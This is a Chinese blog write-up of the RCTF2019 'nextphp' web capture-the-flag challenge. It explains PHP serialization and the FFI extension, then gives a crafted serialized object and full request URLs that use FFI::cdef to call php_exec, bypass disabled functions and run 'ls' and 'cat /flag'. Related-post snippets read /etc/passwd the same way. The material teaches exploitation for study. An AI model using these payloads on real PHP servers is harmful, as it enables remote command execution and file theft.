关于序列化与FFI的一道题

最新推荐文章于 2023-02-22 00:35:26 发布
最新推荐文章于 2023-02-22 00:35:26 发布
阅读量370 收藏
点赞数
分类专栏: Web 文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ephemerally/article/details/108511037
版权

序列化与FFI(Foreign Function Interface)

做了一道关于序列化与FFI的web题,在这里记录一下。
题是RCTF2019nextphp
在这里插入图片描述
题目信息非常简单,我们先随意传一个参数看看。
在这里插入图片描述
在错误信息中,我们发现了一个目录,但是我们不清楚哪些函数可以用,我们查看一下phpinfo
在这里插入图片描述
许多系统函数被禁用了,但是scandir没有被禁用。
在这里插入图片描述
这里有一个有用的信息,“preload.php”,所以我们尝试打开它。
在这里插入图片描述

这里可以发现serialize,是序列化。
什么是序列化?

  • 序列化就是把本来不能直接存储的数据转换成可存储的数据,并且不会丢掉数据格式。

什么是反序列化?

  • 顾名思义,它是序列化的逆过程,把序列化的数据,转换成我们需要的格式。

我们生成一个对象进行测试。

<?php
final class A implements Serializable {
    protected $data = [
        'ret' => null,
        'func' => 'print_r',
        'arg' => '1'
    ];

    private function run () {
        $this->data['ret'] = $this->data['func']($this->data['arg']);
    }

    public function __serialize() {
        return $this->data;
    }

    public function __unserialize(array $data) {
        array_merge($this->data, $data);
        $this->run();
    }

    public function serialize () {
        return serialize($this->data);
    }

    public function unserialize($payload) {
        $this->data = unserialize($payload);
        $this->run();
    }

    public function __get ($key) {
        return $this->data[$key];
    }

    public function __set ($key, $value) {
        
    }

    public function __construct () {
        
    }
}
$a = new A();
$b =serialize($a);
echo $b;

C:1:"A":61:{a:3:{s:3:"ret";N;s:4:"func";s:7:"print_r";s:3:"arg";s:1:"1";}}

将结果传参。

http://210.30.97.133:28073/?a=echo(unserialize(%27C:1:%22A%22:61:{a:3:{s:3:%22ret%22;N;s:4:%22func%22;s:7:%22print_r%22;s:3:%22arg%22;s:1:%221%22;}}%27)-%3E__get(%22ret%22));

在这里插入图片描述
打印出来是1bool(true)
但这道题因为函数禁用的关系,需要用到FFI接口
什么是FFI

  • FFI是php7.4的全新拓展方式,就是在php代码中调用C代码的技术,可以让我们很轻易的调用C写的各种库;

将程序改写如下

<?php
final class A implements Serializable {
    protected $data = [
        'ret' => null,
        'func' => 'FFI::cdef',
        'arg' => 'int php_exec(int type,char* cmd);'
    ];

    private function run () {
        $this->data['ret'] = $this->data['func']($this->data['arg']);
    }

    public function __serialize() {
        return $this->data;
    }

    public function __unserialize(array $data) {
        array_merge($this->data, $data);
        $this->run();
    }

    public function serialize () {
        return serialize($this->data);
    }

    public function unserialize($payload) {
        $this->data = unserialize($payload);
        $this->run();
    }

    public function __get ($key) {
        return $this->data[$key];
    }

    public function __set ($key, $value) {
        
    }

    public function __construct () {
       
    }
}
$a = new A();
$b=serialize($a);
echo $b;
?>

运行结果

C:1:"A":96:{a:3:{s:3:"ret";N;s:4:"func";s:9:"FFI::cdef";s:3:"arg";s:33:"int php_exec(int type,char* cmd);";}}

传参带入。

http://210.30.97.133:28073/?a=echo(unserialize(%27C:1:%22A%22:96:{a:3:{s:3:%22ret%22;N;s:4:%22func%22;s:9:%22FFI::cdef%22;s:3:%22arg%22;s:33:%22int%20php_exec(int%20type,char*%20cmd);%22;}}%27)-%3E__get(%22ret%22)-%3Ephp_exec(1,%27ls%27));

在这里插入图片描述
继续查找,在根目录发现了这个

http://210.30.97.133:28073/?a=echo(unserialize(%27C:1:%22A%22:96:{a:3:{s:3:%22ret%22;N;s:4:%22func%22;s:9:%22FFI::cdef%22;s:3:%22arg%22;s:33:%22int%20php_exec(int%20type,char*%20cmd);%22;}}%27)-%3E__get(%22ret%22)-%3Ephp_exec(1,%27ls%20/%27));

在这里插入图片描述

http://210.30.97.133:28073/?a=echo(unserialize(%27C:1:%22A%22:96:{a:3:{s:3:%22ret%22;N;s:4:%22func%22;s:9:%22FFI::cdef%22;s:3:%22arg%22;s:33:%22int%20php_exec(int%20type,char*%20cmd);%22;}}%27)-%3E__get(%22ret%22)-%3Ephp_exec(1,%27cat%20/flag%27));

最终得到flag
在这里插入图片描述

Ephemerally
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bitser:使用LuaJIT序列和反序列Lua值
05-02
使用LuaJIT序列和反序列Lua值。 local bitser = require ' bitser ' bitser. register ( ' someResource ' , someResource) bitser. registerClass (SomeClass) serializedString = bitser. dumps (someValue)...
fzy-lua-native:Luajit FFI与FZY的绑定
02-03
《fzy-lua-native:Luajit FFI与FZY高效结合的应用解析》 在IT领域,特别是软件开发中,高效、灵活的编程语言和工具是提升开发效率的关键。"fzy-lua-native"项目正是这样一种创新的结合,它巧妙地将LuaJIT的Foreign...
PHP7.4 FFI 扩展安全问
最新发布
weixin_63231007的博客
02-22 1287
PHP 7.4 FFI扩展 bypass disable_function&[RCTF] nextphp&geek2020 FighterFightsInvincibly
php7.4 FFI拓展——让php能够调用C的函数
qq_44657899的博客
10-20 1130
今天在做一道web命令执行的目的时候,用到了FFI这个拓展: payload如下: $ffi = FFI::cdef("int system(char* command);"); $ffi ->system("cat /etc/passwd"); 使用FFI::cdef()函数声明我们要调用的c语言中的函数system,然后调用system执行命令。 大概了解了一下这个拓展,用来调用c语言中的函数和库。然后仿照着别人的代码做了个实验: PHP7.4新特性FFI初体验 我们要在PHP中用ffi调用
php看的懂不会写,用 FFI 写一个普通PHP程序员 “看不懂” 的 “PHP”
weixin_39625337的博客
03-17 116
PHP 7.4 新加入了一个扩展 PHP FFI,这个扩展可以很方便的让PHP调用C语言写的各种优秀的库。什么是FFIFFI(Foreign Function Interface),即外部函数接口,是指在一种语言里调用另一种语言代码的技术。PHP的FFI扩展就是一个让你在PHP里调用C代码的技术。FFI的使用非常简单,只用声明和调用两步就可以,对于有C语言经验,但是不了解Zend引擎的程序员来说...
[RCTF 2019]Nextphp(php7.4的FFI扩展安全问
m0_62422842的博客
12-14 653
这个FFI扩展最初是为了能够更方便的调用C语言的各种库而设计的,然而在不正确的使用下就会像该这样,直接绕过php层的限制去执行命令。当然,个人觉得该扩展引发的安全问也是比较好防护的。设置ffi.enable=preload参数选项,指定特定的php文件去调用FFI。总之,FFI扩展引发的问也是需要了解的。
php算法刷网站,刷[RCTF 2019]Nextphp
weixin_42364392的博客
04-14 294
思路打开发现,???,这么简单嘛,直接一句话写shellfile_put_contents('1.php','');蚁剑连接,???,就这?好吧,只有当前目录的权限,看preload.php,看着是反序列了我懒,不想看序列,不过感觉是都被禁了,没啥用bypass_diasble_function1.LD_PRELOADmail,putenv,error_log全被禁了,打扰了2.**Apa...
ffi
03-16
该代码旨在与Dart版本2.5.0-dev.1.0一起使用。 指示 (当前)已将C make文件编写为在Mac上可以使用。 要编译库,请转到每个子项目中的c文件夹并运行: make dylib .dylib文件应在父文件夹中创建。 导航到该文件并...
elixir-ffi:Elixir的外部功能接口(FFI
02-05
总结起来,Elixir的FFI是通过NIFs实现的,它允许Elixir代码与C语言库进行交互,以提升性能或访问特定功能。使用FFI需要谨慎,但当正确应用时,它可以显著增强Elixir应用程序的能力。通过研究`elixir-ffi-master`项目...
rust-ffi-guide:使用Rust进行FFI的指南
02-05
Rust FFI是Rust语言与外部代码交互的一种机制,允许Rust调用C语言或其他语言编写的函数,反之亦然。这使得Rust可以作为库被其他语言使用,或者利用现有C库的强大功能。本指南将深入探讨如何在Rust项目中实现FFI,...
rust-python27-sys:Python 2.7 的 Rust FFI 声明
06-08
搬家了 rust-python27-sys 库被移动到与高级 rust-cpython 绑定相同的存储库中:
php通过ffi与go互操作 | Gopher Daily (2020.06.27) ʕ◔ϖ◔ʔ
TonyBai
06-27 303
每日一谚:Goroutines aren't free, but they're very cheap.有意想学习容器或Kubernets的童鞋可以了解一下我的慕课网实战...
[RCTF 2019]Nextphp
Sk1y的博客
01-22 1404
php7.4的FFI扩展的安全问以及利用 c标准库的加载
node-ffi之动态库调用
热门推荐
坐在那边看天空 的博客
04-06 1万+
FUNCTION ulong DesEnCodeHex(string str, string key, ref string outstr) library "zm_2007.dll"  int DesEnCodeHex(const char* str,const  char* key, char* outstr) ; //c 接口描述  字符指针传出 function long
关于ffi安装失败的解决办法
ctwillson的博客
10-09 7816
gem install ffi发现没有permission,加上sudo后,报以下错误Building native extensions. This could take a while... ERROR: Error installing ffi: ERROR: Failed to build gem native extension. current directory: /
西普实验吧ctf-web-天网管理系统(序列与反序列)
烟敛寒林的博客
12-28 646
目地址:http://ctf5.shiyanbar.com/10/web1/ 首先还是查看页面源代码,发现注释有一个提示: 当传入的username值经md5加密后等于0,就会返回某样东西! 如何绕过md5函数呢?可以参考下面这篇文章。 https://blog.csdn.net/dyw_666666/article/details/82348564 我们可以用QNKCDZO...
FFI Library (lua 调用 c)
tsh185的专栏
04-07 3340
http://luajit.org/ext_ffi.html The FFI library allows calling external C functions and using C data structuresfrom pure Lua code. The FFI library largely obviates the need to write tedio
Rust FFI C/C++ & Rust 互操作
06-22
Rust FFI (Foreign Function Interface) 是一种技术,允许Rust语言与C/C++等其他编程语言进行交互,使得在不同的编程环境中可以互相调用函数和数据结构。由于C语言的广泛应用,学习如何在Rust中使用FFI尤其重要,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值